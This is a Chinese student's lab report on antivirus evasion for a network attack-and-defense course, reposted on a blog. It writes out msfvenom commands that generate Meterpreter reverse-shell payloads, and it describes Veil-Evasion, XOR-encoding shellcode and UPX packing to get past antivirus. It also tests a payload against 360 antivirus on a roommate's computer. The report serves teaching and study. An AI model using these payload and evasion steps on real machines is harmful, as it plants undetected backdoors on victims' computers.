2017-2018-2 20155231《网络对抗技术》实验三:免杀原理与实践

2017-2018-2 20155231《网络对抗技术》实验3:免杀原理与实践

实验内容

正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
使用msf编码器生成jar包
  • 使用指令msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.174.130 lport=5231 x> 5231_backjar.jar 生成jar文件
  • 上传检测http://www.virscan.org/

1072993-20180411084331302-1491346186.png

直接gg

veil-evasion
  • 输入指令veil进入veil界面 ,输入use evasionlist payloads进入模板界面。(不知道为啥,随便选择一个运行有错,只有选择5才能运行)复制模板,use 模板运行
  • 依然用set LHOST 192.168.174.130,set LPORT 5231设置
  • generate运行
  • 找到生成的文件,上传检测

1072993-20180411084353385-2103020323.png

这居然成了!

1072993-20180411165055996-853394206.png

然而并没有,上传错了文件,exe文件没有通过检测,并且直接被管家杀了

自己利用shellcode编程
  • 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.132 LPORT=443 -f c生成buf[];
  • 利用buf[]生成c语言文件

  • 生成exe文件并且回连
    1072993-20180411084511874-789967592.png

  • (生成的exe文件没有被查杀,还以为成了,但再次打开时遭到了查杀。。。。。)
    1072993-20180411084529449-511175074.png

  • 上传检测

1072993-20180411084558397-507073418.png

失败

通过组合应用各种技术实现恶意代码免杀
利用shellcode编程更改
  • 这里异或了31
    1072993-20180411084614593-1214987422.png

1072993-20180411084659176-136907883.png

  • (没有被查杀)

1072993-20180411084805828-1264496170.png

  • 进行回连

1072993-20180411084710170-1321334043.png

  • 上传检测

1072993-20180411084759157-460122327.png

失败+1

加壳
  • upx #需要加壳的文件名 -o #加壳后的文件名

  • 将之前的shellcode生成的exe文件进行加壳。
    1072993-20180411084923353-143192450.png

  • 回连
    1072993-20180411085146050-1230126291.png

(神奇?!编译时不会被查杀,手动查杀也没被查杀,再次打开时依然被查杀了)
1072993-20180411085007917-233493795.png

-上传检测

1072993-20180411084935739-2133346518.png

失败再+1

加壳之前veil的exe文件,检测,恩,加壳还是有用的,数量减少
1072993-20180411165338370-1670321280.png

用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
  • 将更改加壳后的shellcode编程文件在室友电脑上运行
  • 室友的杀毒软件为360

  • 未被查杀,回连

1072993-20180411085220142-470370102.jpg

1072993-20180411085235365-1394668122.jpg

基础问题回答

  1. 杀软是如何检测出恶意代码的?
  • 通过对比病毒库,检测恶意代码的特征;
  • 或者对比和正常代码的区别
  • 或者监测文件行为
  1. 免杀是做什么?
  • 免杀就是让安插的后门不被AV软件发现
  1. 免杀的基本方法有哪些?
  • 改变特征码,如shellcode编程
  • 改变行为,利用回连或者隧道灯技术

实践总结与体会

  • 虽然大部分被认定为病毒,很伤心,只有veil生成的rc文件通过了检测,只有更改的shellcode编程文件没有被管家检测出来
  • 不过,运用综合技术生成的最终版文件在同学的电脑上也躲过了360的检查,实现了免杀,还可以
  • 由于和室友电脑相互ping不通,没有实现回连,没有实现最终的攻击室友电脑的操作…………hhh

离实战还缺些什么技术或步骤?

  • 和同学几乎一样的操作,但结果经常不同,对于不同的杀毒软件也有不同的结果。手动的很多方法都没通过,反而veil直接给予的模板通过了检测

转载于:https://www.cnblogs.com/javasyn/p/8793145.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值